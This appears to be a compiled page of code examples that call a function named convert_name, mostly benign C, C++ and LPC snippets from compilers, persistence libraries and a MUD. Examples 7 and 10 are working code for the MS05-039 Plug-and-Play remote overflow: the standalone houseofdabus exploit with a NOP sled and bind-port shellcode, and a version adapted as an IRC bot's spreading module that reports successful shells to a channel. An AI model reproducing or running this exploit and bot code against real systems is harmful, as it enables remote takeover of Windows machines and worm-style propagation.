Exemplo n.º 1
/* Emit the control-flow graph of cfg's method as a Graphviz "digraph" on fp.
 *
 * The graph is named by convert_name() applied to the method name; BB0 is
 * drawn as the doubled entry node and BB1 is highlighted.  The basic blocks
 * and edges themselves are written by cfg_emit_one_loop_level().  Nothing is
 * returned and write failures are not checked, as in the sibling routines.
 */
static void
mono_draw_cfg (MonoCompile *cfg, FILE *fp)
{
	const char *graph_name = convert_name (cfg->method->name);

	fprintf (fp, "digraph %s {\n", graph_name);
	fputs ("node [fontsize=12.0]\nedge [len=1,color=red]\n", fp);
	fprintf (fp, "label=\"CFG for %s\";\n", mono_method_full_name (cfg->method, TRUE));
	fputs ("BB0 [shape=doublecircle];\n", fp);
	fputs ("BB1 [color=red];\n", fp);

	cfg_emit_one_loop_level (cfg, fp, NULL);

	fputs ("}\n", fp);
}
Exemplo n.º 2
    /// Load the shared library / DLL named by `filename` and return the
    /// loader's opaque handle (NULL on failure, as dlopen()/LoadLibrary()
    /// report it).
    ///
    /// With g++ the name goes to dlopen() unchanged, with RTLD_LAZY.  With
    /// MSVC it is first passed through convert_name() (defined elsewhere;
    /// presumably rewrites the name in place), echoed to std::cout, and
    /// handed to LoadLibrary().  Any other compiler fails at compile time.
    ///
    /// NOTE(review): the name reaches the loader as given.  When it is not
    /// an absolute path, the platform's library search order decides which
    /// file is loaded, so callers should not forward untrusted names here —
    /// confirm against the call sites.
    void	        *open(const char *filename)
    {
        std::string dllName(filename);   // only used on the MSVC path

# if defined(__GNUG__)
        return dlopen(filename, RTLD_LAZY);
# elif defined(_MSC_VER)
        convert_name(dllName);
        std::cout << dllName << std::endl;   // debug echo of the converted name
        return LoadLibrary(CStringW(dllName.c_str()));
# else
#		error G++ or MS compiler required
# endif
    }
Exemplo n.º 3
/* Emit the dominator tree of cfg's method as a Graphviz "digraph" on fp.
 *
 * Requires the immediate-dominator pass to have run (MONO_COMP_IDOM set in
 * cfg->comp_done); this is asserted, not reported.  The graph name comes
 * from convert_name(), BB0 is the doubled entry node, BB1 is highlighted,
 * and dtree_emit_one_loop_level() writes the nodes and edges.
 */
static void
mono_draw_dtree (MonoCompile *cfg, FILE *fp)
{
	const char *graph_name;

	g_assert ((cfg->comp_done & MONO_COMP_IDOM));

	graph_name = convert_name (cfg->method->name);
	fprintf (fp, "digraph %s {\n", graph_name);
	fputs ("node [fontsize=12.0]\nedge [len=1,color=red]\n", fp);
	fprintf (fp, "label=\"Dominator tree for %s\";\n", mono_method_full_name (cfg->method, TRUE));
	fputs ("BB0 [shape=doublecircle];\n", fp);
	fputs ("BB1 [color=red];\n", fp);

	dtree_emit_one_loop_level (cfg, fp, NULL);

	fputs ("}\n", fp);
}
Exemplo n.º 4
Arquivo: trans.c Projeto: Elohim/FGmud
// The "trans" command: pull a living being into the invoker's room.
//
// args: the name typed by the invoker.  It is looked up first as a player
// (after convert_name) and then as any living thing.  Returns a string to
// show the invoker on failure, 1 otherwise.
mixed cmd(string args) {
    object ob;

    if( !args || args == "" ) return "Trans whom?";
    // Player lookup uses the converted name; the find_living fallback uses
    // the argument exactly as typed.
    if( !(ob = find_player(convert_name(args))) && !(ob = find_living(args)) )
        return "No such being exists anywhere presently.";
    if( environment(ob) == environment(this_player()) ) 
        return ob->GetCapName() + " is right here.";
    // Privilege check: only an arch may trans another arch, and the target
    // is told who tried.  Nothing here restricts transing ordinary players,
    // so access to this command has to be limited where it is installed —
    // verify in the command loader.
    if(archp(ob) && !archp(this_player())){
        write("You can't trans an admin.");
        tell_player(ob, this_player()->GetName()+" just tried to trans you.");
        return 1;
    }
    // Record the target's origin room (presumably for a later return trip).
    ob->SetProperty("ReturnSite",base_name(environment(ob)));
    message("system", "You have been summoned by " + 
            this_player()->GetName() + ".", ob);
    // ReturnSite is set and the summons message delivered before the move
    // is attempted, so both happen even when the move below fails.
    if( !(ob->eventMoveLiving(environment(this_player()))) )
        return "Failed to move " + ob->GetCapName() + ".";
    else message("system", "You trans " + ob->GetCapName() + 
            " to you.", this_player());
    return 1;
}
Exemplo n.º 5
/* tp_getattro for persistent objects.
 *
 * The attribute name is converted to bytes with convert_name() so its C
 * string can be handed to unghost_getattr(); when that says so, the object
 * is unghostified (and marked accessed) before the generic lookup runs.
 * Returns a new reference, or NULL with an exception set if the name
 * conversion, the unghostify or the lookup fails.
 */
static PyObject*
Per_getattro(cPersistentObject *self, PyObject *name)
{
    PyObject *result;
    PyObject *as_bytes = convert_name(name);

    if (as_bytes == NULL)
        return NULL;

    /* Names for which unghost_getattr() answers true force a load first. */
    if (unghost_getattr(PyBytes_AS_STRING(as_bytes)))
    {
        if (unghostify(self) < 0)
        {
            Py_DECREF(as_bytes);
            return NULL;
        }
        accessed(self);
    }

    result = PyObject_GenericGetAttr((PyObject *)self, name);
    Py_DECREF(as_bytes);
    return result;
}
Exemplo n.º 6
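/* Return a new dict holding state's items, minus the "volatile" (_v_*) and
 * "persistent" (_p_*) names.
 *
 * state may be NULL, in which case an empty dict is returned.  Keys that
 * are not str (PY3K) / bytes (PY2) are copied without the prefix test.
 * Returns a new reference, or NULL with an exception set on allocation,
 * name-conversion or insertion failure.
 */
static PyObject *
pickle_copy_dict(PyObject *state)
{
    PyObject *copy, *key, *value;
    char *ckey;
    Py_ssize_t pos = 0;

    copy = PyDict_New();
    if (!copy)
        return NULL;

    if (!state)
        return copy;

    while (PyDict_Next(state, &pos, &key, &value))
    {
        int is_special;
#ifdef PY3K
        if (key && PyUnicode_Check(key))
        {
            PyObject *converted = convert_name(key);
            /* convert_name() can fail (Per_getattro checks for it too);
             * PyBytes_AS_STRING(NULL) would crash, so propagate the error. */
            if (!converted)
                goto err;
            ckey = PyBytes_AS_STRING(converted);
#else
        if (key && PyBytes_Check(key))
        {
            ckey = PyBytes_AS_STRING(key);
#endif
            /* "_v_" / "_p_" prefix test.  The && chain stops at the NUL of a
             * shorter key, so ckey[2] is never read past the terminator. */
            is_special = (*ckey == '_' &&
                          (ckey[1] == 'v' || ckey[1] == 'p') &&
                           ckey[2] == '_');
#ifdef PY3K
            Py_DECREF(converted);
#endif
            if (is_special) /* skip volatile and persistent */
                continue;
        }

        if (PyObject_SetItem(copy, key, value) < 0)
            goto err;
    }

    return copy;
err:
    Py_DECREF(copy);
    return NULL;
}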


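/* Python-visible docstring for __getstate__ (see pickle___getstate__ for
 * the implementation it describes). */
static char pickle___getstate__doc[] =
  "Get the object serialization state\n"
  "\n"
  "If the object has no assigned slots and has no instance dictionary, then \n"
  "None is returned.\n"
  "\n"
  "If the object has no assigned slots and has an instance dictionary, then \n"
  "a copy of the instance dictionary is returned. The copy has any items \n"
  "with names starting with '_v_' or '_p_' omitted.\n"
  "\n"
  "If the object has assigned slots, then a two-element tuple is returned.  \n"
  "The first element is either None or a copy of the instance dictionary, \n"
  "as described above. The second element is a dictionary with items \n"
  "for each of the assigned slots.\n"
  ;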

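/* Implement __getstate__ for persistent objects.
 *
 * Returns a new reference:
 *   - None when the object has no __dict__ pointer and no populated slot;
 *   - a filtered copy of __dict__ (see pickle_copy_dict) when no slot holds
 *     a value;
 *   - otherwise the 2-tuple (dict-or-None, slots) where slots maps every
 *     populated, non-_v_/_p_ slot name to its value.
 * Returns NULL with an exception set on failure.
 */
static PyObject *
pickle___getstate__(PyObject *self)
{
    PyObject *slotnames=NULL, *slots=NULL, *state=NULL;
    PyObject **dictp;
    int n=0;

    slotnames = pickle_slotnames(Py_TYPE(self));
    if (!slotnames)
        return NULL;

    dictp = _PyObject_GetDictPtr(self);
    if (dictp)
    {
        state = pickle_copy_dict(*dictp);
        /* A failed copy used to fall through and reach Py_BuildValue as
         * NULL; stop here while the exception is still the real one. */
        if (!state)
            goto end;
    }
    else
    {
        state = Py_None;
        Py_INCREF(state);
    }

    if (slotnames != Py_None)
    {
        Py_ssize_t i;

        slots = PyDict_New();
        if (!slots)
            goto fail;

        for (i = 0; i < PyList_GET_SIZE(slotnames); i++)
        {
            PyObject *name, *value;
            char *cname;
            int is_special;

            name = PyList_GET_ITEM(slotnames, i);
#ifdef PY3K
            if (PyUnicode_Check(name))
            {
                PyObject *converted = convert_name(name);
                /* convert_name() can fail; PyBytes_AS_STRING(NULL) would
                 * crash, so treat the failure as an error. */
                if (!converted)
                    goto fail;
                cname = PyBytes_AS_STRING(converted);
#else
            if (PyBytes_Check(name))
            {
                cname = PyBytes_AS_STRING(name);
#endif
                is_special = (*cname == '_' &&
                              (cname[1] == 'v' || cname[1] == 'p') &&
                               cname[2] == '_');
#ifdef PY3K
                Py_DECREF(converted);
#endif
                if (is_special) /* skip volatile and persistent */
                {
                    continue;
                }
            }

            /* Unclear:  Will this go through our getattr hook? */
            value = PyObject_GetAttr(self, name);
            if (value == NULL)
                PyErr_Clear();  /* a failing lookup (e.g. an unset slot) is left out */
            else
            {
                int err = PyDict_SetItem(slots, name, value);
                Py_DECREF(value);
                if (err < 0)
                    goto fail;
                n++;
            }
        }
    }

    if (n)
        state = Py_BuildValue("(NO)", state, slots);  /* "N" steals state */

end:
    Py_XDECREF(slotnames);
    Py_XDECREF(slots);

    return state;

fail:
    /* These paths used to return the partially built state with an
     * exception set; return NULL so callers actually see the failure. */
    Py_XDECREF(state);
    state = NULL;
    goto end;
}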

/* Assign every (key, value) pair of dict onto self with PyObject_SetAttr.
 *
 * Returns 0 on success.  Returns -1 with TypeError set when dict is not a
 * dict, or with the setattr error set as soon as one assignment fails
 * (earlier assignments are not undone).
 */
static int
pickle_setattrs_from_dict(PyObject *self, PyObject *dict)
{
    Py_ssize_t iter_pos = 0;
    PyObject *attr_name, *attr_value;

    if (!PyDict_Check(dict))
    {
        PyErr_SetString(PyExc_TypeError, "Expected dictionary");
        return -1;
    }

    for (;;)
    {
        if (!PyDict_Next(dict, &iter_pos, &attr_name, &attr_value))
            return 0;   /* iteration exhausted: every attribute was set */
        if (PyObject_SetAttr(self, attr_name, attr_value) < 0)
            return -1;
    }
}
Exemplo n.º 7
int
main (int argc, char **argv)
{
	struct sockaddr_in addr;
	struct hostent *he;
	int len;
	int sockfd;
	unsigned short smblen;
	unsigned short bindport;
	unsigned char tmp[1024];
	unsigned char packet[4096];
	unsigned char *ptr;
	char recvbuf[4096];

#ifdef _WIN32
	WSADATA wsa;
	WSAStartup(MAKEWORD(2,0), &wsa);
#endif

	printf("\n      (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
	printf("\t         Universal Exploit + no crash shellcode\n\n");
	printf("\t         [Spanish hack by RoMaNSoFt :-)]\n\n\n");
	printf("\t            Copyright (c) 2005 .: houseofdabus :.\n\n\n");


	if (argc < 3) {
		printf("%s <host> <bind port>\n", argv[0]);
		exit(0);
	}

	if ((he = gethostbyname(argv[1])) == NULL) {
		printf("[-] Unable to resolve %s\n", argv[1]);
		exit(0);
	}

	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
		printf("[-] socket failed\n");
		exit(0);
	}

	addr.sin_family = AF_INET;
	addr.sin_port = htons(445);
	addr.sin_addr = *((struct in_addr *)he->h_addr);
	memset(&(addr.sin_zero), '\0', 8);



	printf("\n[*] connecting to %s:445...", argv[1]);
	if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
		printf("\n[-] connect failed\n");
		exit(0);
	}
	printf("ok\n");

	printf("[*] null session...");
	if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if (len <= 10) {
		printf("\n[-] failed\n");
		exit(0);
	}

	if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	ptr = packet;
	memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
	ptr += sizeof(SMB_TreeConnectAndX)-1;

	sprintf(tmp, "\\\\%s\\IPC$", argv[1]);
	convert_name(ptr, tmp);
	smblen = strlen(tmp)*2;
	ptr += smblen;
	smblen += 9;
	memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);

	memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
	ptr += sizeof(SMB_TreeConnectAndX_)-1;

	smblen = ptr-packet;
	smblen -= 4;
	memcpy(packet+3, &smblen, 1);

	if (send(sockfd, packet, ptr-packet, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	printf("ok\n");
	printf("[*] bind pipe...");

	if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	printf("ok\n");
	printf("[*] sending crafted packet...");

	// nop
	ptr = packet;
	memset(packet, '\x90', sizeof(packet));

	// header & offsets
	memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
	ptr += sizeof(RPC_call)-1;

	// shellcode
	bindport = (unsigned short)atoi(argv[2]);
	bindport ^= 0x0437;
	SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
	memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

	// end of packet
	memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
		RPC_call_end,
		sizeof(RPC_call_end)-1);

	// sending...
	if (send(sockfd, packet, 2196, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}
	printf("ok\n");
	printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));

	recv(sockfd, recvbuf, 4096, 0);

return 0;
}
Exemplo n.º 8
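/* Open the directory named by path on drive and return a handle to it.
 *
 * path is walked component by component ('/' and '\\' both separate); a
 * leading separator starts from the drive's root directory, otherwise from
 * its current directory.  "." is skipped, ".." moves to the parent via
 * get_parent_handle(), and any other component is converted with
 * convert_name() and opened with open_dir().
 *
 * Returns the handle of the last component, holding one reference that the
 * caller owns, or a negative error: EINVALIDNAME when a component cannot be
 * converted or is longer than name_comp can hold, otherwise the negative
 * value open_dir()/get_parent_handle() returned.  On error every handle
 * taken along the way has already been released with close_dir().
 */
int open_path(int drive, const char *path) // Opening the directory(s)...
{
	int i, j, curdir_handle, new_handle = -1;
	char name_comp[13], conv_name[11];
	const int max_comp = (int)sizeof(name_comp) - 1;	// leave room for the NUL

	// Starting directory: the drive's root for an absolute path, else its
	// current directory.
	i = 0;
	if (path[0] == '/' || path[0] == '\\')	// Absolute path
	{
		curdir_handle = root_handle(drive);
		i = 1;
	}
	else curdir_handle = get_curdir_handle(drive);

	// Increment the reference count; every handle held here is released
	// with close_dir() before moving on or returning an error.
	increment_ref_count(curdir_handle);

	while (path[i] != 0)
	{
		// Copy one component, stopping at a separator or the end.
		j = 0;
		while (path[i] != 0 && path[i] != '/' && path[i] != '\\')
		{
			if (j >= max_comp)
			{
				// A component longer than name_comp can hold is not a
				// valid name; reject it instead of silently cutting it
				// and parsing its tail as a further component.
				close_dir(curdir_handle);
				return EINVALIDNAME; // Error
			}
			name_comp[j] = path[i];
			j++; i++;
		}

		if (path[i] != 0) i++;	// step over the separator

		name_comp[j] = 0;

		if (strcmp(name_comp,".") == 0) continue;	// stay where we are
		else if (strcmp(name_comp,"..") == 0)
		{
			// Parent handle: also needs a reference of its own
			// (a negative value is an error, handled below).
			new_handle = get_parent_handle(curdir_handle);
			if (new_handle >= 0)
				increment_ref_count(new_handle);
		}
		else
		{
			// Open that directory component
			if (convert_name(name_comp, conv_name) < 0)
			{
				close_dir(curdir_handle);
				return EINVALIDNAME; // Error
			}

			new_handle = open_dir(curdir_handle, conv_name);
		}

		if (new_handle < 0)
		{
			close_dir(curdir_handle);
			return new_handle; // Error
		}

		close_dir(curdir_handle); // Effectively decrease the
					  // reference count to 1 less.
		curdir_handle = new_handle;
	}

	// Successfully opened the path
	return curdir_handle;
}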
Exemplo n.º 9
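/* Turn self into a ghost: drop its in-memory state and leave the cache ring.
 *
 * Does nothing for an object that is already a ghost.  An object with no
 * cache is simply marked GHOST.  Otherwise the cache's non-ghost count and
 * size estimate are adjusted, the object is unlinked from the ring, its
 * __dict__ is released, and (only if the class does not override __new__)
 * every __slots__ entry except the _p_* ones is deleted.  Finally the
 * ring's reference to self is dropped, which may free the object, so self
 * must not be touched after the call.
 *
 * Cannot report an error directly; callers check PyErr_Occurred() after
 * it returns.
 */
static void
ghostify(cPersistentObject *self)
{
    PyObject **dictptr, *slotnames;

    /* are we already a ghost? */
    if (self->state == cPersistent_GHOST_STATE)
        return;

    /* Is it ever possible to not have a cache? */
    if (self->cache == NULL) 
    {
        self->state = cPersistent_GHOST_STATE;
        return;
    }

    if (self->ring.r_next == NULL)
    {
        /* There's no way to raise an error in this routine. */
#ifdef Py_DEBUG
        fatal_1350(self, "ghostify", "claims to be in a cache but isn't");
#else
        return;
#endif
    }

    /* If we're ghostifying an object, we better have some non-ghosts. */
    assert(self->cache->non_ghost_count > 0);
    self->cache->non_ghost_count--;
    self->cache->total_estimated_size -= 
        _estimated_size_in_bytes(self->estimated_size);
    ring_del(&self->ring);
    self->state = cPersistent_GHOST_STATE;

    /* clear __dict__ */
    dictptr = _PyObject_GetDictPtr((PyObject *)self);
    if (dictptr && *dictptr)
    {
        Py_DECREF(*dictptr);
        *dictptr = NULL;
    }

    /* clear all slots besides _p_*
     * ( for backward-compatibility reason we do this only if class does not
     *   override __new__ ) */
    if (Py_TYPE(self)->tp_new == Pertype.tp_new)
    {
        slotnames = pickle_slotnames(Py_TYPE(self));
        if (slotnames && slotnames != Py_None)
        {
            Py_ssize_t i;

            for (i = 0; i < PyList_GET_SIZE(slotnames); i++)
            {
                PyObject *name;
                char *cname;
                int is_special;

                name = PyList_GET_ITEM(slotnames, i);
#ifdef PY3K
                if (PyUnicode_Check(name))
                {
                    PyObject *converted = convert_name(name);
                    if (converted == NULL)
                    {
                        /* convert_name() can fail (Per_getattro checks for
                         * it); PyBytes_AS_STRING(NULL) crashed here before.
                         * Nothing can be raised from this routine, so drop
                         * the error and fall through to the delete below,
                         * exactly as is done for non-str slot names. */
                        PyErr_Clear();
                        is_special = 0;
                    }
                    else
                    {
                        cname = PyBytes_AS_STRING(converted);
                        is_special = !strncmp(cname, "_p_", 3);
                        Py_DECREF(converted);
                    }
#else
                if (PyBytes_Check(name))
                {
                    cname = PyBytes_AS_STRING(name);
                    is_special = !strncmp(cname, "_p_", 3);
#endif
                    if (is_special) /* skip persistent */
                    {
                        continue;
                    }
                }

                /* NOTE: this skips our delattr hook */
                if (PyObject_GenericSetAttr((PyObject *)self, name, NULL) < 0)
                    /* delattr of non-set slot will raise AttributeError - we
                     * simply ignore. */
                    PyErr_Clear();
            }
        }
        Py_XDECREF(slotnames);
    }

    /* We remove the reference to the just ghosted object that the ring
    * holds.  Note that the dictionary of oids->objects has an uncounted
    * reference, so if the ring's reference was the only one, this frees
    * the ghost object.  Note further that the object's dealloc knows to
    * inform the dictionary that it is going away.
    */
    Py_DECREF(self);
}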

/* Register self as changed with its jar.
 *
 * Only an up-to-date or sticky object that has a jar is registered: the
 * jar's "register" attribute is called with self as the single argument
 * and, on success, the state becomes CHANGED.  Ghosts, already-changed
 * objects and jar-less objects are left untouched.  Returns 0 on success
 * or when nothing needed doing, -1 with an exception set if the attribute
 * lookup, tuple allocation or call fails.
 */
static int
changed(cPersistentObject *self)
{
    static PyObject *s_register;   /* interned "register", created on first use */
    PyObject *register_meth, *args, *call_result;
    int rc = -1;
    int clean = (self->state == cPersistent_UPTODATE_STATE ||
                 self->state == cPersistent_STICKY_STATE);

    if (!clean || !self->jar)
        return 0;

    if (s_register == NULL)
        s_register = INTERN("register");

    register_meth = PyObject_GetAttr((PyObject *)self->jar, s_register);
    if (register_meth == NULL)
        return -1;

    args = PyTuple_New(1);
    if (args == NULL)
        goto out;

    Py_INCREF(self);                              /* SET_ITEM steals this */
    PyTuple_SET_ITEM(args, 0, (PyObject *)self);
    call_result = PyEval_CallObject(register_meth, args);
    Py_DECREF(args);
    if (call_result == NULL)
        goto out;
    Py_DECREF(call_result);

    self->state = cPersistent_CHANGED_STATE;
    rc = 0;

out:
    Py_DECREF(register_meth);
    return rc;
}

/* Call jar.readCurrent(self) for an up-to-date or sticky object that has
 * both a jar and an oid; otherwise do nothing.
 *
 * Returns 0 on success or when skipped, -1 with an exception set when the
 * call fails.  The result of the call itself is discarded.
 */
static int
readCurrent(cPersistentObject *self)
{
    static PyObject *s_readCurrent=NULL;   /* interned "readCurrent" */
    PyObject *call_result;
    int clean = (self->state == cPersistent_UPTODATE_STATE ||
                 self->state == cPersistent_STICKY_STATE);

    if (!clean || !self->jar || !self->oid)
        return 0;

    if (s_readCurrent == NULL)
        s_readCurrent = INTERN("readCurrent");

    call_result = PyObject_CallMethodObjArgs(self->jar, s_readCurrent, self, NULL);
    if (call_result == NULL)
        return -1;
    Py_DECREF(call_result);

    return 0;
}

/* _p_deactivate(): ghostify an up-to-date object that has a jar.
 *
 * The instance __dict__ is released first, then ghostify() does the rest.
 * Objects in any other state, or without a jar, are left alone.  Always
 * returns None, except that a pending exception after ghostify() (which
 * cannot raise itself) is reported by returning NULL.
 */
static PyObject *
Per__p_deactivate(cPersistentObject *self)
{
    PyObject **dictptr;

    if (self->state != cPersistent_UPTODATE_STATE || !self->jar)
        Py_RETURN_NONE;

    /* Drop the instance dict before handing over to ghostify(). */
    dictptr = _PyObject_GetDictPtr((PyObject *)self);
    if (dictptr != NULL && *dictptr != NULL)
    {
        Py_DECREF(*dictptr);
        *dictptr = NULL;
    }

    /* Note that we need to set to ghost state unless we are
       called directly. Methods that override this need to
       do the same! */
    ghostify(self);
    if (PyErr_Occurred())
        return NULL;

    Py_RETURN_NONE;
}

/* _p_activate(): load the object's state via unghostify().
 *
 * Returns None on success, NULL with the exception unghostify() set on
 * failure.
 */
static PyObject *
Per__p_activate(cPersistentObject *self)
{
    int rc = unghostify(self);

    if (rc < 0)
        return NULL;

    Py_RETURN_NONE;
}

static int Per_set_changed(cPersistentObject *self, PyObject *v);

/* _p_invalidate(): throw away the object's state and make it a ghost.
 *
 * A ghost is left as it is.  Otherwise Per_set_changed(self, NULL) (the
 * _p_changed setter declared above) runs first, then ghostify(); since
 * ghostify() cannot raise, a pending exception is checked for afterwards.
 * Returns None, or NULL with an exception set.
 */
static PyObject *
Per__p_invalidate(cPersistentObject *self)
{
    if (self->state != cPersistent_GHOST_STATE)
    {
        if (Per_set_changed(self, NULL) < 0)
            return NULL;
        ghostify(self);
        if (PyErr_Occurred())
            return NULL;
    }

    Py_RETURN_NONE;
}
Exemplo n.º 10
BOOL
ppexploit (EXINFO exinfo)
//main (int argc, char **argv)
{
	int len;
	char buffer[IRCLINE];
	SOCKET sockfd;
	int pport = 7777;
	BOOL success = FALSE;
	SOCKADDR_IN their_addr;
	memset(&their_addr, 0, sizeof(their_addr));
	//struct sockaddr_in addr;
	char recvbuf[4096];
//	struct hostent *he;
	unsigned short smblen;
	unsigned short bindport;
	char tmp[1024];
	char packet[4096];
	char *ptr;


/*	WSADATA wsa;
	WSAStartup(MAKEWORD(2,0), &wsa);*/


	//printf("\n      (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
	//printf("\t         Universal Exploit + no crash shellcode\n\n\n");
	//printf("\t            Copyright (c) 2005 .: houseofdabus :.\n\n\n");


/*	if (argc < 3) {
		printf("%s <host> <bind port>\n", argv[0]);
		exit(0);
	}
*/
/*	if ((he = gethostbyname(argv[1])) == NULL) {
		printf("[-] Unable to resolve %s\n", argv[1]);
		exit(0);
	}
*/
	if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) {
		return FALSE;
	}
	their_addr.sin_family = AF_INET;
	their_addr.sin_addr.s_addr = finet_addr(exinfo.ip); 
	their_addr.sin_port = fhtons((unsigned short)exinfo.port);
	
	/*addr.sin_family = AF_INET;
	addr.sin_port = fhtons((unsigned short)exinfo.port);
	addr.sin_addr.s_addr = finet_addr(exinfo.ip);*/
	memset(&(their_addr.sin_zero), '\0', 8);



	//printf("\n[*] connecting to %s:445...", argv[1]);
	if (fconnect(sockfd, (LPSOCKADDR)&their_addr, sizeof(struct sockaddr)) < 0) {
		return FALSE;
	}
	//printf("ok\n");

	//printf("[*] null session...");
	if (fsend(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
		return FALSE;
	}

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		return FALSE;
	}

	if (fsend(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
		return FALSE;
	}

	len = frecv(sockfd, recvbuf, 4096, 0);
	if (len <= 10) {
		return FALSE;
	}

	if (fsend(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
		return FALSE;
	}

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		return FALSE;
	}

	ptr = packet;
	memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
	ptr += sizeof(SMB_TreeConnectAndX)-1;

	sprintf(tmp, "\\\\%s\\IPC$", exinfo.ip);
	convert_name(ptr, tmp);
	smblen = strlen(tmp)*2;
	ptr += smblen;
	smblen += 9;
	memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);

	memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
	ptr += sizeof(SMB_TreeConnectAndX_)-1;

	smblen = ptr-packet;
	smblen -= 4;
	memcpy(packet+3, &smblen, 1);

	if (fsend(sockfd, packet, ptr-packet, 0) < 0) {
		return FALSE;
	}

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		return FALSE;
	}

	//printf("ok\n");
	//printf("[*] bind pipe...");

	if (fsend(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
		return FALSE;
	}

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		return FALSE;
	}

	if (fsend(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
		return FALSE;
	}

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		return FALSE;
	}

	//printf("ok\n");
	//printf("[*] sending crafted packet...");

	// nop
	ptr = packet;
	memset(packet, '\x90', sizeof(packet));

	// header & offsets
	memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
	ptr += sizeof(RPC_call)-1;

	// shellcode
	bindport = (unsigned short)atoi((const char *)pport);
	bindport ^= 0x0437;
	SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
	memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

	// end of packet
	memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
		RPC_call_end,
		sizeof(RPC_call_end)-1);

	// sending...
	if (fsend(sockfd, packet, 2196, 0) < 0) {
		return FALSE;
	}
//	printf("ok\n");
//	printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));
	frecv(sockfd, recvbuf, 4096, 0);
	Sleep(300);
	fclosesocket(sockfd);
	if (ConnectShell2(exinfo)) {
		if(!exinfo.silent)
		{
			_snprintf(buffer, sizeof(buffer), "[FTP]: Transfer info sent to IP: %s.", exinfo.ip);
			irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
			addlog(buffer);
		}
		exploit[exinfo.exploit].stats++;
		return TRUE;
	}
return FALSE;
}
Exemplo n.º 11
0
/**********************************************************************
 *	    ConvertDialog32To16   (KERNEL.615)
 *
 * Rewrite a 32-bit dialog template (standard or DIALOGEX, recognised by
 * the 0xffff0001 signature in the first DWORD) into the 16-bit template
 * layout.  Data is streamed from dialog32 into dialog16 through the
 * get_*/put_* helpers, which advance the pointers they are given.
 *
 * dialog32: start of the 32-bit template.
 * size:     declared size of the template.  NOTE(review): it is never
 *           consulted below; every read is driven by counts, lengths and
 *           string terminators found inside the template itself, so a
 *           malformed template is read past its end.  Validation is the
 *           caller's job.
 * dialog16: destination buffer.  No capacity is passed; the caller must
 *           have sized it for the converted output (the string
 *           conversions are told 0x7fffffff bytes are available).
 */
VOID WINAPI ConvertDialog32To16( LPVOID dialog32, DWORD size, LPVOID dialog16 )
{
    WORD nbItems, data, dialogEx;
    DWORD style;

    style = get_dword( &dialog32 );
    put_dword( &dialog16, style );
    dialogEx = (style == 0xffff0001);  /* DIALOGEX resource */
    if (dialogEx)
    {
